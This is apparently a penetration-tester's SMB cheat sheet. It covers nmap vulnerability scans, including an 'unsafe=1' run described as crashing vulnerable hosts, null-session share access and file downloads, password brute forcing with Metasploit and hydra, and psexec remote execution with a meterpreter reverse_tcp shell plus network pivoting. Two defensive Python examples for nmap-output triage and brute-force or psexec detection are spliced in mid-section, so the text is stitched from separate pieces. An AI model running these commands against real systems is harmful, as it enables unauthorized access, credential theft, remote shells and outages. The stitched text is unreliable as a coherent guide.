SMB

---Port 445---
Can also be used with: 139
//this was pre-2000 Windows, as SMB was originally done via NetBIOS and required a NetBIOS connection. Now it is its own TCP protocol.
Can be several other UDP ports when SMB is set up via the Windows NetBIOS API.

ls -1 /usr/share/nmap/scripts/smb*
//remember that all of these have arguments that you can pass with --script-args=
//we could also just run all of them with:
nmap -p 445 --script smb* <ip>

SMB discover: (connect and return OS/SMB info)
nmap 10.10.10.111 --script=smb-os-discovery

SMB Vulnerability Scan:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10

SMB Users & Shares Scan:
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10

Connect to SMB share:
(Linux)
smbclient //MOUNT/share
smbclient -L 10.10.10.3
smbclient -L lame
smbclient -U "" \\\\10.10.10.3\\tmp
//also try -N with this to say no password
smbclient -N \\\\172.16.80.22\\tmp -U ""
or
smbclient -L 10.130.40.70 -U administrator
(Windows)
C:\> net use \\10.130.40.70\IPC$ password /u:administrator
C:\> net view \\10.130.40.70

Nmap for SMB open:
#nmap -p139,445 <range or CIDR> --open
//only shows IPs with SMB open
or
#nmap -v -p 139,445 10.11.1.1-254

Search for SMB scripts in nmap NSE:
#ls -l /usr/share/nmap/scripts/ | grep smb
//use a script
#nmap -p 139,445 --script smb-enum-users <ip>
//check for vulns with the check-vulns script
#nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <ip>
//Searching for IPs vuln to ms08-067
//--script-args is used to pass the script arguments. In this case we pass it unsafe=1, which will exploit and crash the system if vulnerable.
#nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.5

SMB NULL session:
Is an unauthenticated NetBIOS session.
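For the defender's side of the scans above, an added example that is not from these notes: it turns nmap's XML output (-oX) from the smb-os-discovery, smb-vuln-* and smb-enum-shares scripts into a per-host remediation list (OS banner, checks reported VULNERABLE, shares reachable without credentials). It assumes nmap's <script>/<table>/<elem> XML layout as in the constructed sample; the hosts and results are made up.

```python
import xml.etree.ElementTree as ET

def parse_nmap_smb(xml_text):
    """One triage record per host that has SMB findings: OS banner, ids of VULNERABLE
    smb-vuln-* checks, and shares reachable anonymously (i.e. via a null session)."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        rec = {"addr": host.find("address").get("addr"), "os": None,
               "vulnerable": [], "anon_shares": []}
        for script in host.iter("script"):        # both port scripts and hostscripts
            sid = script.get("id", "")
            if sid == "smb-os-discovery":
                os_elem = script.find("elem[@key='os']")
                rec["os"] = os_elem.text if os_elem is not None else None
            elif sid.startswith("smb-vuln-"):
                # assumed vulns-library layout: one <table key=ID> per check, with an <elem key="state">
                for table in script.findall("table"):
                    state = table.find("elem[@key='state']")
                    if state is not None and state.text.startswith("VULNERABLE"):
                        rec["vulnerable"].append(table.get("key"))
            elif sid == "smb-enum-shares":
                for table in script.findall("table"):   # assumed: one <table> per share
                    access = table.find("elem[@key='Anonymous access']")
                    if access is not None and access.text != "<none>":
                        rec["anon_shares"].append(table.get("key"))
        if rec["os"] or rec["vulnerable"] or rec["anon_shares"]:
            findings.append(rec)
    return findings

# Constructed sample in nmap's XML layout (not a real scan): host .10 is flagged by
# ms17-010 and exposes one share anonymously; host .11 only has 445 closed.
SAMPLE_XML = r"""<nmaprun>
<host><address addr="10.10.10.10" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="open"/>
  <script id="smb-vuln-ms17-010" output="VULNERABLE"><table key="CVE-2017-0143">
   <elem key="state">VULNERABLE</elem></table></script>
  <script id="smb-vuln-ms08-067" output="NOT VULNERABLE"><table key="MS08-067">
   <elem key="state">NOT VULNERABLE</elem></table></script>
 </port></ports>
 <hostscript>
  <script id="smb-os-discovery" output="..."><elem key="os">Windows 7 Professional 7601 Service Pack 1</elem></script>
  <script id="smb-enum-shares" output="...">
   <table key="\\10.10.10.10\ADMIN$"><elem key="Anonymous access">&lt;none&gt;</elem></table>
   <table key="\\10.10.10.10\Public"><elem key="Anonymous access">READ</elem></table></script>
 </hostscript></host>
<host><address addr="10.10.10.11" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="closed"/></port></ports></host>
</nmaprun>"""
```

Hosts with no SMB findings (like .11) are dropped, so the output is directly the list of machines that need patching or share hardening.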
This is allowed to set up communications with new computers but can be abused up to Windows XP SP1, as SP2 is patched. You can still look for incorrect configurations. A null session also allows unauthenticated hackers to obtain large amounts of information about the machine, such as password policies, usernames, group names, machine names, and user and host SIDs. This Microsoft feature existed in SMB1 by default.

SMB1 – Windows 2000, XP and Windows 2003
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012

--
Null:
#nmblookup -A 10.10.10.175
#smbmap -H 10.10.10.175
List share contents:
#smbmap -R Replication -H 10.10.10.10
Download a file: (will be placed in /usr/share)
#smbmap -R Replication -H 10.10.10.10 -A file.txt -q

Authed:
#smbmap -d active.htb -u svc_tgs -p somepasswrd -H 10.10.10.10
List share contents:
#smbmap -d active.htb -u svc_tgs -p somepasswrd -R Replication -H 10.10.10.10
Download a file: (will be placed in /usr/share)
#smbmap -d active.htb -u svc_tgs -p somepasswrd -R Replication -H 10.10.10.10 -A file.txt -q
--

Password Brute Forcing:
(RDP and SMB) Increasing the number of threads may not be possible due to protocol restrictions, making the password guessing process relatively slow. On top of this, protocol authentication negotiations of a protocol such as RDP are more time consuming than, say, HTTP, which slows down the attacks on these protocols even more. However, while brute-forcing the RDP protocol may be a slower process than HTTP, a successful attack on RDP would often provide a bigger reward.
//With MSF
#systemctl enable postgresql
#msfdb init
#msfconsole
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set PASS_FILE /usr/share/seclists/Passwords/best15.txt
msf auxiliary(smb_login) > set USER_FILE /usr/share/seclists/Usernames/top_shortlist.txt
msf auxiliary(smb_login) > set RHOSTS 10.130.40.70
msf auxiliary(smb_login) > run

//hydra
hydra -L usernames.txt -P /usr/share/john/password.lst 192.168.2.66 smb -V -f

-look into dumpsec for automated dumping of SMB

Enumerate shares (Authenticated):
#nmap --script=smb-enum-users -p 445 10.130.40.70 --script-args smbuser=administrator,smbpass=password
//we can also use rpcclient and enumdomusers for this

RCE (Authenticated):
//Manual
If we have writeable shares we can psexec
#psexec.py active.htb/svc_tgs@10.10.10.10
//MSF
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.130.40.70
msf exploit(psexec) > set SMBPass password
msf exploit(psexec) > set SMBUser administrator
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 172.16.10.5
msf exploit(psexec) > exploit
meterpreter > sysinfo

--------------------- Post Exploitation -------------------
Host discovery:
//This is to attempt pivoting from the compromised box that we are on. So first we will set up our routing, then we will scan.
meterpreter > run autoroute -s 172.30.111.0/24
meterpreter > background
msf exploit(psexec) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 172.30.111.0/24
msf auxiliary(tcp) > set THREADS 10
msf auxiliary(tcp) > set PORTS 139,445
msf auxiliary(tcp) > run

Null session pivot to another box:
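On the detection side of the password-guessing and psexec sections above, an added example that is not from these notes: two checks run over constructed Windows event records written in a simple key=value form. The first flags repeated 4625 network-logon failures (logon type 3, which is what smb_login and hydra produce) from one source; the second flags a remote ADMIN$ share access (5140) followed shortly by a service install (7045), the trace psexec-style execution leaves. The event IDs are real; the hosts, addresses, thresholds and service name are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5                    # assumed: this many failures from one source IP ...
FAIL_WINDOW = timedelta(minutes=2)    # ... inside this window => password guessing
SVC_WINDOW = timedelta(seconds=60)    # assumed: ADMIN$ access then new service this fast => psexec-style

def parse_event(line):
    """Parse one constructed 'key=value ...' event line; 'ts' becomes a datetime."""
    rec = dict(kv.split("=", 1) for kv in line.split())
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec

def detect_smb_bruteforce(events):
    """Source IPs with >= FAIL_THRESHOLD 4625 (logon type 3 = network) failures within FAIL_WINDOW."""
    recent, alerts = defaultdict(list), set()
    for e in sorted(events, key=lambda r: r["ts"]):
        if e["id"] != "4625" or e.get("type") != "3":
            continue
        q = recent[e["src"]]
        q.append(e["ts"])
        while e["ts"] - q[0] > FAIL_WINDOW:   # slide the window forward
            q.pop(0)
        if len(q) >= FAIL_THRESHOLD:
            alerts.add(e["src"])
    return sorted(alerts)

def detect_psexec_pattern(events):
    """(host, src, service) where a remote ADMIN$ access (5140) precedes a service install (7045)."""
    admin_access, alerts = defaultdict(list), []
    for e in sorted(events, key=lambda r: r["ts"]):
        if e["id"] == "5140" and e.get("share") == "ADMIN$":
            admin_access[e["host"]].append((e["ts"], e["src"]))
        elif e["id"] == "7045":
            for ts, src in admin_access[e["host"]]:
                if timedelta(0) <= e["ts"] - ts <= SVC_WINDOW:
                    alerts.append((e["host"], src, e["svc"]))
                    break
    return alerts

# Constructed sample events (not real logs): five rapid failures from 10.0.0.50, one
# benign failure from 10.0.0.9, then ADMIN$ access from 10.0.0.50 and a new service on SRV02.
SAMPLE_EVENTS = [parse_event(l) for l in """
ts=2024-05-01T10:00:00 id=4625 host=SRV02 src=10.0.0.50 user=administrator type=3
ts=2024-05-01T10:00:10 id=4625 host=SRV02 src=10.0.0.50 user=administrator type=3
ts=2024-05-01T10:00:15 id=4625 host=SRV02 src=10.0.0.9 user=jdoe type=3
ts=2024-05-01T10:00:20 id=4625 host=SRV02 src=10.0.0.50 user=administrator type=3
ts=2024-05-01T10:00:30 id=4625 host=SRV02 src=10.0.0.50 user=svc_tgs type=3
ts=2024-05-01T10:00:40 id=4625 host=SRV02 src=10.0.0.50 user=svc_tgs type=3
ts=2024-05-01T10:05:00 id=5140 host=SRV02 src=10.0.0.50 share=ADMIN$
ts=2024-05-01T10:05:20 id=7045 host=SRV02 svc=svc_xyz1
""".strip().splitlines()]
```

Tune FAIL_THRESHOLD and the windows to the environment's normal failure rate; a 7045 with no preceding remote ADMIN$ access is left alone, which keeps ordinary software installs out of the alert list.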
